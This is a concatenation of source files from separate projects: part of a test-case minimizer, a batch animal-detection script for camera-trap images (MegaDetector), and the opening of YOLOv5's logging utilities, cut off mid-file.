    data = self.minimizer.token_combiner(current_tokens)
    handle = self.minimizer.get_temp_file()
    destination = handle.name
    try:
      handle.write(data)
    except IOError:
      # We may have filled the disk. Try processing tests and writing again.
      self._do_single_pass_process()
      handle.write(data)
    handle.close()
    return destination

  def _get_test_file(self, hypothesis):
    """Return a test file for a hypothesis."""
    complement = self._range_complement(hypothesis)
    return self._prepare_test_input(self.tokens, complement)

  def _push_test_to_queue(self, hypothesis):
    """Add a test for a hypothesis to a queue for processing."""
    test_file = self._get_test_file(hypothesis)
    callback = functools.partial(
        self._handle_completed_test,
        hypothesis=hypothesis,
        input_file=test_file)
    should_run = functools.partial(self._contains_required_tokens, hypothesis,
                                   test_file)
    self.test_queue.push(
        test_file,
        self.minimizer.test_function,
        callback,
        should_run=should_run)

    # Make sure that we do not let too many unprocessed tests build up.
    if self.test_queue.size() >= self.minimizer.batch_size:
      self._do_single_pass_process()

  def prepare_test(self, hypothesis):
    """Prepare the test based on the mode we are running in."""
    # Check the cache to make sure we have not tested this before.
    if self._has_tested(hypothesis):
      return

    # If we are single-threaded, just run and process results immediately.
    if not self.test_queue:
      # In the threaded case, we call the cleanup function before each pass
      # over the queue. It needs to be tracked here for the single-thread case.
      self.runs_since_last_cleanup += 1
      if (self.runs_since_last_cleanup >=
          self.minimizer.single_thread_cleanup_interval and
          self.minimizer.cleanup_function):
        self.minimizer.cleanup_function()
      test_file = self._get_test_file(hypothesis)
      if self._contains_required_tokens(hypothesis, test_file):
        self._handle_completed_test(
            self.minimizer.test_function(test_file), hypothesis, test_file)

      # Check to see if we have exceeded the deadline and report progress.
      self._report_progress()
      self._deadline_exceeded()
      return

    if self.currently_processing:
      # If we are processing, we cannot write more tests or add to the queue.
      with self.tests_to_queue_lock:
        self.tests_to_queue.append(hypothesis)
    else:
      self._push_test_to_queue(hypothesis)

  # Functions used when processing test results.
  def _handle_completed_test(self, test_passed, hypothesis, input_file):
    """Update state based on the test result and hypothesis."""
    # If the test failed, handle the result.
    if not test_passed:
      self._handle_failing_hypothesis(hypothesis)

    # Delete leftover files if necessary.
    self._delete_file_if_needed(input_file)

    # Minimizers may need to do something with the test result.
    self._process_test_result(test_passed, hypothesis)

  def _process_test_result(self, test_passed, hypothesis):
    """Additional processing of the result. Minimizers may override this."""
    pass

  def _handle_failing_hypothesis(self, hypothesis):
    """Update the token list for a failing hypothesis."""
    if not self.test_queue:
      # We aren't multithreaded, so just update the list directly.
      for token in hypothesis:
        self.required_tokens[token] = False
      return

    # Batch failing hypotheses and merge them MAX_MERGE_BATCH_SIZE at a time.
    with self.merge_preparation_lock:
      self.unmerged_failing_hypotheses.append(hypothesis)
      if len(self.unmerged_failing_hypotheses) < MAX_MERGE_BATCH_SIZE:
        return
      hypotheses_to_merge = self.unmerged_failing_hypotheses
      self.unmerged_failing_hypotheses = []

    # We may need to block while the previous batch is merging. If not, the
    # results from this batch could conflict with the results from the previous.
    with self.merge_lock:
      self._attempt_merge(hypotheses_to_merge)

  def _attempt_merge(self, hypotheses, sibling_merge_succeeded=False):
    """Update the required token list if the queued changes don't conflict."""
    # If there's nothing to merge, we're done.
    if not hypotheses:
      return

    aggregate_tokens = set()
    for hypothesis in hypotheses:
      for token in hypothesis:
        aggregate_tokens.add(token)
    aggregate_hypothesis = list(aggregate_tokens)

    if sibling_merge_succeeded:
      # We were able to remove all tokens from the other half of this
      # hypothesis, so we can assume that this would fail without running the
      # test. If this would also pass, there would not have been a conflict
      # while testing this set. Well, this could be a flaky test, but then we
      # have bigger problems.
      test_passed = True
    else:
      complement = self._range_complement(aggregate_hypothesis)
      test_file = self._prepare_test_input(self.tokens, complement)
      test_passed = self.minimizer.test_function(test_file)
      self._delete_file_if_needed(test_file)

    # Failed (crashed), so there was no conflict here.
    if not test_passed:
      for token in aggregate_hypothesis:
        self.required_tokens[token] = False
      return True

    # Passed (no crash). We need to try a bit harder to resolve this conflict.
    if len(hypotheses) == 1:
      # We really cannot remove this token. No additional work to be done.
      return False

    # Bisect the batch recursively to find a consistent subset to merge.
    # NOTE: "/" here is integer division under Python 2; under Python 3 it
    # would produce a float and break the slices.
    front = hypotheses[:len(hypotheses) / 2]
    back = hypotheses[len(hypotheses) / 2:]

    # If we could remove either one of two hypotheses, favor removing the first.
    front_merged_successfully = self._attempt_merge(front)
    self._attempt_merge(back, sibling_merge_succeeded=front_merged_successfully)
    return False

  def _do_single_pass_process(self):
    """Process through a single pass of our test queue."""
    self.currently_processing = True
    self.test_queue.process()

    # If a cleanup function is provided, call it. This is usually used to
    # ensure that all processes are terminated or perform additional cleanup.
    if self.minimizer.cleanup_function:
      self.minimizer.cleanup_function()

    # Push any results generated while this test was running to the queue.
    self.currently_processing = False
    while self.tests_to_queue:
      with self.tests_to_queue_lock:
        hypothesis = self.tests_to_queue.pop(0)
      # This may trigger another round of processing, so don't hold the lock.
      self._push_test_to_queue(hypothesis)

  def process(self):
    """Start a test."""
    if not self.test_queue:
      return
    while self.test_queue.size():
      self._do_single_pass_process()

    # Merge any remaining failing hypotheses that never filled a full batch.
    with self.merge_preparation_lock:
      hypotheses_to_merge = self.unmerged_failing_hypotheses
      self.unmerged_failing_hypotheses = []
    with self.merge_lock:
      self._attempt_merge(hypotheses_to_merge)

  # Cache functions.
  def _contains_required_tokens(self, hypothesis, test_file):
    """Check to see if this hypothesis contains untested tokens."""
    # It is possible that we could copy this while it is being updated. We do
    # not block in this case because the worst case scenario is that we run an
    # irrelevant test, and blocking is potentially expensive.
    working_required_tokens = copy.copy(self.required_tokens)
    with self.merge_preparation_lock:
      # A deep copy is not required. Hypotheses are not modified after being
      # added to the list for processing.
      unprocessed_hypotheses = copy.copy(self.unmerged_failing_hypotheses)

    for unprocessed_hypothesis in unprocessed_hypotheses:
      for token in unprocessed_hypothesis:
        # For this check, we do not care if the merge would succeed or not since
        # the best case is that we would add the token to the queue as well.
        working_required_tokens[token] = False

    for token in hypothesis:
      if working_required_tokens[token]:
        return True

    # If we aren't going to run this test, this will not have a completion
    # callback. If that happens, we need to clean up now.
    self._delete_file_if_needed(test_file)
    return False

  def _has_tested(self, hypothesis):
    """Check to see if this hypothesis has been tested before."""
    hypothesis_tuple = tuple(hypothesis)
    with self.cache_lock:
      if hypothesis_tuple in self.tested_hypotheses:
        return True
      self.tested_hypotheses.add(hypothesis_tuple)
      return False

  # Result checking functions.
  def get_result(self):
    """Get the result of minimization."""
    if not self.minimizer.tokenize:
      return self.get_required_tokens()
    return str(self)

  def get_required_tokens(self):
    """Return all required tokens for this test case."""
    return [t for i, t in enumerate(self.tokens) if self.required_tokens[i]]

  def get_required_token_indices(self):
    """Get the indices of all remaining required tokens."""
    return [i for i, v in enumerate(self.required_tokens) if v]
def _default_tokenizer(s):
  """Split a string into tokens, one token per newline-delimited line."""
  separator = '\n'
  return s.split(separator)
def _default_combiner(tokens):
  """Join line tokens back into a single newline-delimited string."""
  separator = '\n'
  return separator.join(tokens)
class Minimizer(object):
  """Base class for minimizers.

  Subclasses implement |_execute| to drive a specific minimization strategy;
  |minimize| wraps it with deadline-recovery handling.
  """

  def __init__(self,
               test_function,
               max_threads=1,
               tokenizer=_default_tokenizer,
               token_combiner=_default_combiner,
               tokenize=True,
               cleanup_function=None,
               single_thread_cleanup_interval=DEFAULT_CLEANUP_INTERVAL,
               deadline=None,
               get_temp_file=None,
               delete_temp_files=True,
               batch_size=None,
               progress_report_function=None,
               file_extension=''):
    """Initialize a minimizer. A minimizer object can be used multiple times."""
    self.test_function = test_function
    self.max_threads = max_threads
    self.tokenizer = tokenizer
    self.token_combiner = token_combiner
    self.tokenize = tokenize
    self.cleanup_function = cleanup_function
    self.single_thread_cleanup_interval = single_thread_cleanup_interval
    self.deadline = deadline
    # NOTE(review): this assignment is redundant -- get_temp_file is
    # unconditionally reassigned by the if/else block below.
    self.get_temp_file = get_temp_file
    self.delete_temp_files = delete_temp_files
    self.progress_report_function = progress_report_function
    if batch_size:
      self.batch_size = batch_size
    else:
      # Default to enough queued tests to keep every worker thread busy.
      self.batch_size = DEFAULT_TESTS_PER_THREAD * max_threads
    if not get_temp_file:
      # Default temp files stay on disk (delete=False) so test functions can
      # reopen them by name; deletion is handled by _delete_file_if_needed.
      self.get_temp_file = functools.partial(
          tempfile.NamedTemporaryFile,
          mode='wb',
          delete=False,
          prefix='min_',
          suffix=file_extension)
    else:
      self.get_temp_file = get_temp_file

  @staticmethod
  def _handle_constructor_argument(key, kwargs, default=None):
    """Cleanup a keyword argument specific to a subclass and get the value."""
    result = default
    try:
      result = kwargs[key]
      del kwargs[key]
    except KeyError:
      pass
    return result

  def _execute(self, data):
    """Perform minimization on a test case."""
    raise NotImplementedError

  def minimize(self, data):
    """Wrapper to perform common tasks and call |_execute|."""
    try:
      testcase = self._execute(data)
    except errors.MinimizationDeadlineExceededError, error:  # Python 2 syntax.
      # When a MinimizationDeadlineExceededError is raised, the partially
      # minimized test case is stored with it so that we can recover the work
      # that had been done up to that point.
      testcase = error.testcase
    return testcase.get_result()

  @staticmethod
  def run(data, thread_count=DEFAULT_THREAD_COUNT, file_extension=''):
    """Minimize |data| using this minimizer's default configuration."""
    raise NotImplementedError
|
run_detector_batch.py | r"""
Module to run an animal detection model on lots of images, writing the results
to a file in the same format produced by our batch API:
https://github.com/microsoft/CameraTraps/tree/master/api/batch_processing
This enables the results to be used in our post-processing pipeline; see
api/batch_processing/postprocessing/postprocess_batch_results.py .
This script can save results to checkpoints intermittently, in case disaster
strikes. To enable this, set --checkpoint_frequency to n > 0, and results
will be saved as a checkpoint every n images. Checkpoints will be written
to a file in the same directory as the output_file, and after all images
are processed and final results file written to output_file, the temporary
checkpoint file will be deleted. If you want to resume from a checkpoint, set
the checkpoint file's path using --resume_from_checkpoint.
The `threshold` you can provide as an argument is the confidence threshold above
which detections will be included in the output file.
Has preliminary multiprocessing support for CPUs only; if a GPU is available, it will
use the GPU instead of CPUs, and the --ncores option will be ignored. Checkpointing
is not supported when using multiprocessing.
Sample invocation:
# All on the 1212-image test subset
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/md_v4.1.0/md_v4.1.0.pb ~/data/test-small ~/tmp/mdv4test.json --output_relative_filenames --recursive # 2.52 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/md_v4.1.0/md_v4.1.0.pb ~/data/test-small ~/tmp/mdv4test.json --output_relative_filenames --recursive --use_image_queue # 3.03 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.torchscript.pt ~/data/test-small ~/tmp/mdv5test-00.json --output_relative_filenames --recursive # 5.77 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.torchscript.pt ~/data/test-small ~/tmp/mdv5test-01.json --output_relative_filenames --recursive --use_image_queue # 7.2 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.pt ~/data/test-small ~/tmp/mdv5test-00.json --output_relative_filenames --recursive # 6.54 im/s
CUDA_VISIBLE_DEVICES=0 python detection/run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.pt ~/data/test-small ~/tmp/mdv5test-01.json --output_relative_filenames --recursive --use_image_queue # 8.44 im/s
CUDA_VISIBLE_DEVICES=0 python run_detector_batch.py ~/models/camera_traps/megadetector/camonly_mosaic_xlarge_dist_5a_last.pt ~/data/KRU ~/tmp/mdv5test-00.json --output_relative_filenames --recursive
CUDA_VISIBLE_DEVICES=0 python run_detector_batch.py ~/models/camera_traps/megadetector/mdv5_camonly_mosaic_xlarge_dist_5c_epoch28.pt ~/data/KRU ~/tmp/mdv5test-00.json --output_relative_filenames --recursive
"""
#%% Constants, imports, environment
import argparse
import json
import os
import sys
import time
import copy
import shutil
import warnings
import itertools
from datetime import datetime
from functools import partial
import humanfriendly
from tqdm import tqdm
# from multiprocessing.pool import ThreadPool as workerpool
import multiprocessing
from threading import Thread
from multiprocessing import Process
from multiprocessing.pool import Pool as workerpool
# Number of images to pre-fetch
max_queue_size = 10
use_threads_for_queue = False
verbose = False
# Useful hack to force CPU inference.
#
# Need to do this before any PT/TF imports
force_cpu = False
if force_cpu:
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
from detection.run_detector import ImagePathUtils, is_gpu_available, load_detector
from detection.run_detector import FAILURE_INFER, DEFAULT_OUTPUT_CONFIDENCE_THRESHOLD,\
FAILURE_IMAGE_OPEN, DEFAULT_DETECTOR_LABEL_MAP
import visualization.visualization_utils as viz_utils
# Numpy FutureWarnings from tensorflow import
warnings.filterwarnings('ignore', category=FutureWarning)
#%% Support functions for multiprocessing
def producer_func(q, image_files):
    """Image-loading producer; only used when using the (optional) image queue.

    Loads each file in image_files and places [path, image] pairs on the
    blocking queue q, followed by a single None sentinel to signal completion.
    """
    def _log(msg):
        print(msg)
        sys.stdout.flush()

    if verbose:
        _log('Producer starting')

    for im_file in image_files:
        try:
            if verbose:
                _log('Loading image {}'.format(im_file))
            image = viz_utils.load_image(im_file)
        except Exception as e:
            print('Producer process: image {} cannot be loaded. Exception: {}'.format(im_file, e))
            raise
        if verbose:
            _log('Queueing image {}'.format(im_file))
        q.put([im_file, image])

    q.put(None)
    _log('Finished image loading')
def consumer_func(q, return_queue, model_file, confidence_threshold):
    """Detection consumer; only used when using the (optional) image queue.

    Pulls [path, image] pairs from the blocking queue q, runs the detector on
    each, and puts the accumulated results list on return_queue when the None
    sentinel arrives.
    """
    if verbose:
        print('Consumer starting'); sys.stdout.flush()

    start_time = time.time()
    detector = load_detector(model_file)
    elapsed = time.time() - start_time
    print('Loaded model (before queueing) in {}'.format(humanfriendly.format_timespan(elapsed)))
    sys.stdout.flush()

    results = []
    while True:
        item = q.get()
        if item is None:
            # Sentinel: hand the results back and stop consuming.
            q.task_done()
            return_queue.put(results)
            return
        im_file, image = item
        if verbose:
            print('De-queued image {}'.format(im_file)); sys.stdout.flush()
        results.append(process_image(im_file, detector, confidence_threshold, image))
        if verbose:
            print('Processed image {}'.format(im_file)); sys.stdout.flush()
        q.task_done()
def run_detector_with_image_queue(image_files, model_file, confidence_threshold, quiet=False):
    """
    Driver function for the (optional) multiprocessing-based image queue; only used when --use_image_queue
    is specified. Starts a reader process to read images from disk, but processes images in the
    process from which this function is called (i.e., does not currently spawn a separate consumer
    process).

    Returns the list of per-image result dicts produced by the consumer.

    NOTE(review): the 'quiet' parameter is accepted but never used in this
    function body.
    """
    q = multiprocessing.JoinableQueue(max_queue_size)
    return_queue = multiprocessing.Queue(1)

    # The producer either runs as a thread (shares memory) or a separate
    # process, controlled by the module-level use_threads_for_queue flag.
    if use_threads_for_queue:
        producer = Thread(target=producer_func, args=(q, image_files,))
    else:
        producer = Process(target=producer_func, args=(q, image_files,))
    producer.daemon = False
    producer.start()

    # TODO
    #
    # The queue system is a little more elegant if we start one thread for reading and one
    # for processing, and this works fine on Windows, but because we import TF at module load,
    # CUDA will only work in the main process, so currently the consumer function runs here.
    #
    # To enable proper multi-GPU support, we may need to move the TF import to a separate module
    # that isn't loaded until very close to where inference actually happens.
    run_separate_consumer_process = False

    if run_separate_consumer_process:
        if use_threads_for_queue:
            consumer = Thread(target=consumer_func, args=(q, return_queue, model_file, confidence_threshold,))
        else:
            consumer = Process(target=consumer_func, args=(q, return_queue, model_file, confidence_threshold,))
        consumer.daemon = True
        consumer.start()
    else:
        # Consumer runs inline in this process (see TODO above re: CUDA).
        consumer_func(q, return_queue, model_file, confidence_threshold)

    producer.join()
    print('Producer finished')

    if run_separate_consumer_process:
        consumer.join()
        print('Consumer finished')

    q.join()
    print('Queue joined')

    # The consumer put its accumulated results list on return_queue.
    results = return_queue.get()
    return results
#%% Other support functions
def chunks_by_number_of_chunks(ls, n):
    """
    Splits a list into n even chunks.

    Chunk i receives the elements ls[i], ls[i + n], ls[i + 2n], ... (i.e.,
    elements are distributed round-robin by stride).

    Args
    - ls: list
    - n: int, # of chunks
    """
    for start in range(n):
        yield ls[start::n]
#%% Image processing functions
def process_images(im_files, detector, confidence_threshold, use_image_queue=False, quiet=False):
    """
    Runs MegaDetector over a list of image files.

    Args
    - im_files: list of str, paths to image files
    - detector: loaded model or str (path to .pb/.pt model file)
    - confidence_threshold: float, only detections above this threshold are returned
    - use_image_queue: bool, pre-load images via the producer queue
    - quiet: bool, suppress per-image console output

    Returns
    - results: list of dict, each dict represents detections on one image
      see the 'images' key in https://github.com/microsoft/CameraTraps/tree/master/api/batch_processing#batch-processing-api-output-format
    """
    if isinstance(detector, str):
        start_time = time.time()
        detector = load_detector(detector)
        elapsed = time.time() - start_time
        print('Loaded model (batch level) in {}'.format(humanfriendly.format_timespan(elapsed)))

    if use_image_queue:
        # Bug fix: the queue-based path previously discarded this return value,
        # leaving 'results' unbound and raising UnboundLocalError on return.
        # NOTE(review): run_detector_with_image_queue names its second
        # parameter model_file; passing an already-loaded detector here looks
        # suspect -- confirm against callers.
        results = run_detector_with_image_queue(im_files, detector,
                                                confidence_threshold, quiet=quiet)
    else:
        results = []
        for im_file in im_files:
            results.append(process_image(im_file, detector, confidence_threshold, quiet=quiet))
    return results
def process_image(im_file, detector, confidence_threshold, image=None, quiet=False):
    """
    Runs MegaDetector over a single image file.

    Args
    - im_file: str, path to image file
    - detector: loaded model
    - confidence_threshold: float, only detections above this threshold are returned
    - image: previously-loaded image, if available
    - quiet: bool, suppress per-image console output

    Returns:
    - result: dict representing detections on one image
      see the 'images' key in https://github.com/microsoft/CameraTraps/tree/master/api/batch_processing#batch-processing-api-output-format
    """
    if not quiet:
        print('Processing image {}'.format(im_file))

    # Load the image from disk unless the caller already supplied one.
    if image is None:
        try:
            image = viz_utils.load_image(im_file)
        except Exception as e:
            if not quiet:
                print('Image {} cannot be loaded. Exception: {}'.format(im_file, e))
            return {
                'file': im_file,
                'failure': FAILURE_IMAGE_OPEN
            }

    try:
        result = detector.generate_detections_one_image(
            image, im_file, detection_threshold=confidence_threshold)
    except Exception as e:
        if not quiet:
            print('Image {} cannot be processed. Exception: {}'.format(im_file, e))
        return {
            'file': im_file,
            'failure': FAILURE_INFER
        }

    return result
#%% Main function
def load_and_run_detector_batch(model_file, image_file_names, checkpoint_path=None,
                                confidence_threshold=0, checkpoint_frequency=-1,
                                results=None, n_cores=0, use_image_queue=False, quiet=False):
    """
    Args
    - model_file: str, path to .pb model file
    - image_file_names: list of str, paths to image files
    - checkpoint_path: str, path to JSON checkpoint file
    - confidence_threshold: float, only detections above this threshold are returned
    - checkpoint_frequency: int, write results to JSON checkpoint file every N images
    - results: list of dict, existing results loaded from checkpoint
    - n_cores: int, # of CPU cores to use
    - use_image_queue: bool, pre-load images with a producer process/thread
    - quiet: bool, suppress per-image console output

    Returns
    - results: list of dict, each dict represents detections on one image
    """
    if results is None:
        results = []

    # Images already present in a restored checkpoint are skipped below.
    already_processed = set([i['file'] for i in results])

    print('GPU available: {}'.format(is_gpu_available(model_file)))

    # Multiprocessing and the image queue are mutually exclusive with
    # GPU inference / each other; fall back to a single worker.
    if n_cores > 1 and is_gpu_available(model_file):
        print('Warning: multiple cores requested, but a GPU is available; parallelization across GPUs is not currently supported, defaulting to one GPU')
        n_cores = 1

    if n_cores > 1 and use_image_queue:
        print('Warning: multiple cores requested, but the image queue is enabled; parallelization with the image queue is not currently supported, defaulting to one worker')
        n_cores = 1

    if use_image_queue:
        assert n_cores <= 1
        # NOTE: the queue path does not support checkpointing or the
        # already_processed skip list.
        results = run_detector_with_image_queue(image_file_names, model_file, confidence_threshold, quiet)

    elif n_cores <= 1:

        # Load the detector
        start_time = time.time()
        detector = load_detector(model_file)
        elapsed = time.time() - start_time
        print('Loaded model in {}'.format(humanfriendly.format_timespan(elapsed)))

        # Does not count those already processed
        count = 0

        for im_file in tqdm(image_file_names):

            # Will not add additional entries not in the starter checkpoint
            if im_file in already_processed:
                if not quiet:
                    print('Bypassing image {}'.format(im_file))
                continue

            count += 1

            result = process_image(im_file, detector, confidence_threshold, quiet=quiet)
            results.append(result)

            # Write a checkpoint if necessary
            if checkpoint_frequency != -1 and count % checkpoint_frequency == 0:

                print('Writing a new checkpoint after having processed {} images since last restart'.format(count))

                assert checkpoint_path is not None

                # Back up any previous checkpoints, so a crash mid-write
                # cannot destroy the last good checkpoint.
                checkpoint_tmp_path = None
                if os.path.isfile(checkpoint_path):
                    checkpoint_tmp_path = checkpoint_path + '_tmp'
                    shutil.copyfile(checkpoint_path, checkpoint_tmp_path)

                # Write the new checkpoint
                with open(checkpoint_path, 'w') as f:
                    json.dump({'images': results}, f, indent=1)

                # Remove the backup checkpoint if it exists
                if checkpoint_tmp_path is not None:
                    os.remove(checkpoint_tmp_path)

            # ...if it's time to make a checkpoint

    else:

        # When using multiprocessing, let the workers load the model
        detector = model_file

        print('Creating pool with {} cores'.format(n_cores))

        if len(already_processed) > 0:
            print('Warning: when using multiprocessing, all images are reprocessed')

        # NOTE(review): this pool is never close()d/join()ed; harmless for a
        # one-shot script but a resource leak if called repeatedly.
        pool = workerpool(n_cores)

        image_batches = list(chunks_by_number_of_chunks(image_file_names, n_cores))
        results = pool.map(partial(process_images, detector=detector,
                                   confidence_threshold=confidence_threshold), image_batches)

        results = list(itertools.chain.from_iterable(results))

    # Results may have been modified in place, but we also return it for
    # backwards-compatibility.
    return results
def write_results_to_file(results, output_file, relative_path_base=None, detector_file=None):
    """
    Writes list of detection results to JSON output file. Format matches
    https://github.com/microsoft/CameraTraps/tree/master/api/batch_processing#batch-processing-api-output-format

    Args
    - results: list of dict, each dict represents detections on one image
    - output_file: str, path to JSON output file, should end in '.json'
    - relative_path_base: str, path to a directory as the base for relative paths
    - detector_file: str, optional detector filename recorded in the 'info' block
    """
    if relative_path_base is not None:
        # Rewrite each entry's 'file' field relative to the base directory,
        # using shallow copies so callers' dicts are not mutated.
        rebased = []
        for entry in results:
            entry_copy = copy.copy(entry)
            entry_copy['file'] = os.path.relpath(entry_copy['file'], start=relative_path_base)
            rebased.append(entry_copy)
        results = rebased

    info = {
        'detection_completion_time': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S'),
        'format_version': '1.1'
    }
    if detector_file is not None:
        info['detector'] = os.path.basename(detector_file)

    final_output = {
        'images': results,
        'detection_categories': DEFAULT_DETECTOR_LABEL_MAP,
        'info': info
    }
    with open(output_file, 'w') as f:
        json.dump(final_output, f, indent=1)
    print('Output file saved at {}'.format(output_file))
#%% Interactive driver

# Never executed when the module is run; kept as an interactive notebook-style
# cell for stepping through this file in an IDE.
if False:

    pass

    #%%

    # Example parameters for an interactive run.
    checkpoint_path = None
    model_file = r'G:\temp\models\md_v4.1.0.pb'
    confidence_threshold = 0.1
    checkpoint_frequency = -1
    results = None
    ncores = 1
    use_image_queue = True
    quiet = False
    image_dir = r'G:\temp\demo_images\ssmini'
    # NOTE(review): the doubled "image_file_names =" looks like an editing
    # leftover; it is harmless.
    image_file_names = image_file_names = ImagePathUtils.find_images(image_dir, recursive=False)

    # image_file_names = image_file_names[0:2]

    start_time = time.time()

    # python run_detector_batch.py "g:\temp\models\md_v4.1.0.pb" "g:\temp\demo_images\ssmini" "g:\temp\ssmini.json" --recursive --output_relative_filenames --use_image_queue
    results = load_and_run_detector_batch(model_file=model_file,
                                          image_file_names=image_file_names,
                                          checkpoint_path=checkpoint_path,
                                          confidence_threshold=confidence_threshold,
                                          checkpoint_frequency=checkpoint_frequency,
                                          results=results,
                                          n_cores=ncores,
                                          use_image_queue=use_image_queue,
                                          quiet=quiet)

    elapsed = time.time() - start_time
    print('Finished inference in {}'.format(humanfriendly.format_timespan(elapsed)))
#%% Command-line driver
def main():
    """Command-line entry point: parse arguments, validate inputs, run the
    detector over the requested images, write results, and clean up any
    checkpoint file."""
    parser = argparse.ArgumentParser(
        description='Module to run a TF/PT animal detection model on lots of images')
    parser.add_argument(
        'detector_file',
        help='Path to detector model file (.pb or .pt)')
    parser.add_argument(
        'image_file',
        help='Path to a single image file, a JSON file containing a list of paths to images, or a directory')
    parser.add_argument(
        'output_file',
        help='Path to output JSON results file, should end with a .json extension')
    parser.add_argument(
        '--recursive',
        action='store_true',
        help='Recurse into directories, only meaningful if image_file points to a directory')
    parser.add_argument(
        '--output_relative_filenames',
        action='store_true',
        help='Output relative file names, only meaningful if image_file points to a directory')
    parser.add_argument(
        '--quiet',
        action='store_true',
        help='Suppress per-image console output')
    parser.add_argument(
        '--use_image_queue',
        action='store_true',
        help='Pre-load images, may help keep your GPU busy; does not currently support checkpointing.  Useful if you have a very fast GPU and a very slow disk.')
    parser.add_argument(
        '--threshold',
        type=float,
        default=DEFAULT_OUTPUT_CONFIDENCE_THRESHOLD,
        help="Confidence threshold between 0 and 1.0, don't include boxes below this confidence in the output file. Default is 0.1")
    parser.add_argument(
        '--checkpoint_frequency',
        type=int,
        default=-1,
        help='Write results to a temporary file every N images; default is -1, which disables this feature')
    parser.add_argument(
        '--checkpoint_path',
        type=str,
        default=None,
        help='File name to which checkpoints will be written if checkpoint_frequency is > 0')
    parser.add_argument(
        '--resume_from_checkpoint',
        help='Path to a JSON checkpoint file to resume from, must be in same directory as output_file')
    parser.add_argument(
        '--ncores',
        type=int,
        default=0,
        help='Number of cores to use; only applies to CPU-based inference, does not support checkpointing when ncores > 1')

    # With no arguments at all, print help rather than an argparse error.
    if len(sys.argv[1:]) == 0:
        parser.print_help()
        parser.exit()

    args = parser.parse_args()

    # Validate inputs up front so we fail before any expensive work.
    assert os.path.exists(args.detector_file), 'detector file {} does not exist'.format(args.detector_file)
    assert 0.0 < args.threshold <= 1.0, 'Confidence threshold needs to be between 0 and 1'  # Python chained comparison
    assert args.output_file.endswith('.json'), 'output_file specified needs to end with .json'
    if args.checkpoint_frequency != -1:
        assert args.checkpoint_frequency > 0, 'Checkpoint_frequency needs to be > 0 or == -1'
    if args.output_relative_filenames:
        assert os.path.isdir(args.image_file), 'image_file must be a directory when --output_relative_filenames is set'

    if os.path.exists(args.output_file):
        print('Warning: output_file {} already exists and will be overwritten'.format(args.output_file))

    # Load the checkpoint if available
    #
    # Relative file names are only output at the end; all file paths in the checkpoint are
    # still full paths.
    if args.resume_from_checkpoint:
        assert os.path.exists(args.resume_from_checkpoint), 'File at resume_from_checkpoint specified does not exist'
        with open(args.resume_from_checkpoint) as f:
            saved = json.load(f)
        assert 'images' in saved, \
            'The file saved as checkpoint does not have the correct fields; cannot be restored'
        results = saved['images']
        print('Restored {} entries from the checkpoint'.format(len(results)))
    else:
        results = []

    # Find the images to score; images can be a directory, may need to recurse
    if os.path.isdir(args.image_file):
        image_file_names = ImagePathUtils.find_images(args.image_file, args.recursive)
        print('{} image files found in the input directory'.format(len(image_file_names)))
    # A json list of image paths
    elif os.path.isfile(args.image_file) and args.image_file.endswith('.json'):
        with open(args.image_file) as f:
            image_file_names = json.load(f)
        print('{} image files found in the json list'.format(len(image_file_names)))
    # A single image file
    elif os.path.isfile(args.image_file) and ImagePathUtils.is_image_file(args.image_file):
        image_file_names = [args.image_file]
        print('A single image at {} is the input file'.format(args.image_file))
    else:
        raise ValueError('image_file specified is not a directory, a json list, or an image file, '
                         '(or does not have recognizable extensions).')

    assert len(image_file_names) > 0, 'Specified image_file does not point to valid image files'
    assert os.path.exists(image_file_names[0]), 'The first image to be scored does not exist at {}'.format(image_file_names[0])

    output_dir = os.path.dirname(args.output_file)

    if len(output_dir) > 0:
        os.makedirs(output_dir, exist_ok=True)

    assert not os.path.isdir(args.output_file), 'Specified output file is a directory'

    # Test that we can write to the output_file's dir if checkpointing requested
    if args.checkpoint_frequency != -1:

        if args.checkpoint_path is not None:
            checkpoint_path = args.checkpoint_path
        else:
            checkpoint_path = os.path.join(output_dir, 'checkpoint_{}.json'.format(datetime.utcnow().strftime("%Y%m%d%H%M%S")))

        # Confirm that we can write to the checkpoint path, rather than failing after 10000 images
        with open(checkpoint_path, 'w') as f:
            json.dump({'images': []}, f)
        print('The checkpoint file will be written to {}'.format(checkpoint_path))

    else:

        checkpoint_path = None

    start_time = time.time()

    results = load_and_run_detector_batch(model_file=args.detector_file,
                                          image_file_names=image_file_names,
                                          checkpoint_path=checkpoint_path,
                                          confidence_threshold=args.threshold,
                                          checkpoint_frequency=args.checkpoint_frequency,
                                          results=results,
                                          n_cores=args.ncores,
                                          use_image_queue=args.use_image_queue,
                                          quiet=args.quiet)

    elapsed = time.time() - start_time
    print('Finished inference for {} images in {}'.format(
        len(results), humanfriendly.format_timespan(elapsed)))

    relative_path_base = None
    if args.output_relative_filenames:
        relative_path_base = args.image_file
    write_results_to_file(results, args.output_file, relative_path_base=relative_path_base,
                          detector_file=args.detector_file)

    # The checkpoint is only a crash-recovery artifact; remove it once the
    # final output file has been written.
    if checkpoint_path:
        os.remove(checkpoint_path)
        print('Deleted checkpoint file {}'.format(checkpoint_path))

    print('Done!')
if __name__ == '__main__':
main()
|
__init__.py | # YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Logging utils
"""
import os
import warnings
from threading import Thread
import pkg_resources as pkg
import torch
from torch.utils.tensorboard import SummaryWriter
from utils.general import colorstr, emojis
from utils.loggers.wandb.wandb_utils import WandbLogger
from utils.plots import plot_images, plot_results
from utils.torch_utils import de_parallel
# Supported logging backends: results.csv text file, TensorBoard, Weights & Biases.
LOGGERS = ("csv", "tb", "wandb")  # text-file, TensorBoard, Weights & Biases
# Distributed-training rank; -1 means single-process (non-DDP) training.
RANK = int(os.getenv("RANK", -1))
try:
    import wandb

    assert hasattr(wandb, "__version__")  # verify package import not local dir
